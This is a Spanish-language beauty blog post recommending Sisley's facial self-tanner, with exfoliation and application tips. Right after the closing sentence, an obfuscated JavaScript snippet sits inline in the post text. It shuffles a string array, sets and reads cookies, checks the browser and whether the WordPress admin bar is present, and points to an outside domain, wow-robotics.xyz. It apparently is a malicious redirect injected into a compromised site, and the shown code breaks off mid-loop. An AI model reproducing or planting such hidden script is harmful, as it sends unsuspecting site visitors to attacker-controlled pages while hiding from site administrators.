Durante esta época del año, es muy normal que el tono de nuestra piel esté pálido y tengamos la necesidad de buscar soluciones para darle un poquito de color y de vitalidad. Pues bien, un producto que no puede faltar en nuestro cuidado diario, es el autobronceador para rostro.

Os recomiendo este autobronceador de Sisley “Super Soin Autobronzant Hydratant Visage”. Tiene un perfume fresco y agradable, que aporta a la piel un tono dorado de forma natural.
Desde la primera aplicación, aporta un efecto bronceado muy natural incluso en las pieles claras. Y tras 4 semanas de aplicación, el tono es duradero y uniforme, además de dejar la piel perfectamente hidratada y confortable.

Es importante, realizar una exfoliación en la piel antes de aplicar el autobronceador, ya que así se eliminan las células muertas y el tono quedará más uniforme. Y a continuación, hay que aplicar una capa fina y uniforme sobre la piel perfectamente limpia y seca evitando las cejas y la raíz del cabello.
Es aconsejable usarlo de 2 a 3 veces por semana según el resultado deseado. Y no olvides, que hay que lavarse bien las manos tras su utilización, porque de lo contrario, las palmas de las manos quedarán manchadas.

¡Verás que cuando veas sus resultados, no podrás vivir si él! 😉 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone